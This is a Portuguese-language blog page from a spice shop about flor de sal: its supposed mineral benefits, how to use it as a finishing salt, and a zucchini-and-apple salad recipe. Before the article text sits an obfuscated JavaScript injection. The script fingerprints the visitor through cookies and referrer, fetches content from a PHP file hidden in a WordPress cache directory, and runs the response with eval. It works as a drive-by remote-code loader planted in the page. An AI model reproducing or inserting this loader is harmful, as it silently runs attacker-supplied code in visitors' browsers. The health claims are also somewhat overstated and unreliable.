;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//blog.bombayhs.com.br/wp-content/cache/asset-cleanup/css/item/inline/inline.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

A ​Flor de sal é o nome que se dá aos primeiros cristais de sal que se formam na superfície das salinas, recolhidos em tanques rasos de argila. O seu nome tem a ver com a delicadeza presente nos cristais, que se originam de camadas finas de sal, formadas na superfície das salinas. Confira o que é e como usar:

Quais são os benefícios da flor de sal?

A flor de sal é extremamente rica em minerais benéficos à saúde como o zinco, cobre, ferro, manganês, cálcio e o potássio, além de conter bem menos sódio conforme o sal refinado.

Qual é a composição da flor de sal?

A flor de sal é rica em vários nutrientes, como zinco, magnésio, cálcio, potássio, ferro, cobre, flúor, iodo, entre outros que fazem bem ao organismo, sendo por este o motivo então faz com que o tempero seja considerado tão benéfico à saúde.

Como usar flor de sal?

A flor de sal pode ser usada como tempero nos alimentos, mas não deve ser levada ao fogo porque dessa maneira forma perde a sua textura crocante, portanto, sua utilização é bem diferente do sal marinho.

Assim, a flor de sal é excelente para temperar saladas ou adicionar aos alimentos no final da confecção e, como o sabor da flor de sal é bem mais concentrado, pode-se usar uma quantidade pequena.

Receitas com flor de sal

Um exemplo de receitas que realçam as propriedades da flor de sal são as saladas, como é o exemplo da salada de abobrinha e maçã. Confira os ingredientes necessários e como prepará-la:

Ingredientes:

  • Meia abobrinha;
  • 4 folhas de alface;
  • 1 cenoura;
  • 1 Maçã;
  • 1 pitada de flor de sal;
  • 1 colher de chá de vinagre de vinho branco;
  • 1 colher de sopa de azeite de alecrim.

Modo de preparo

Lavar os legumes, colocar a alface em uma taça e juntar a cenoura e a abobrinha raladas. Lavar e fatiar a maçã e acrescentar. Temperar e servir como acompanhamento ou prato principal numa refeição leve.

A flor de sal também funciona como condimento para servir à mesa ou como guarnição. Por sua textura crocante e beleza, oferece um toque refinado às refeições, sendo, geralmente, salpicada por cima dos pratos já prontos.

Como servir flor de sal

Guarnição gourmet

Um ingrediente de finalização, pois realça o sabor de sopas, saladas, peixes, carnes, frutas, vegetais e até sobremesas, é a flor de sal.

É importante usá-lo apenas na comida antes de servir, e não durante o cozimento, pois as altas temperaturas fazem com que os cristais derretam e percam seu caráter único.

Para salpicar pratos

A flor de sal oferece um toque especial às suas preparações. Pode-se utilizar uma colher de chá em um movimento circular em um movimento circular bem acima do prato, esmagando os cristais entre as pontas dos dedos e soltando aleatoriamente sobre os alimentos.

Condimento

Mantenha uma variedade de sais marinhos naturais e aromatizados em pequenas tigelas de cerâmica ou vidro sobre a mesa, ou bancada da cozinha e reabasteça conforme necessário. A variedade de cristais coloridos é bonita e enriquece a experiência do jantar.

Sobremesas

Pelo sabor diferenciado, a Flor de sal serve para compor sobremesas. Uma receita interessante é feita de caramelo e feita borrifando o ingrediente sobre o doce conforme necessário. No lugar do caramelo, você pode utilizar também balas, cremes ou outros pratos doces, pois conseguirá assim contrastar a doçura sobre o sal.

Confira mais dicas como essa em nosso Blog! E acesse o site da Bombay para encontrar os melhores temperos para suas receitas!

Deixe uma Resposta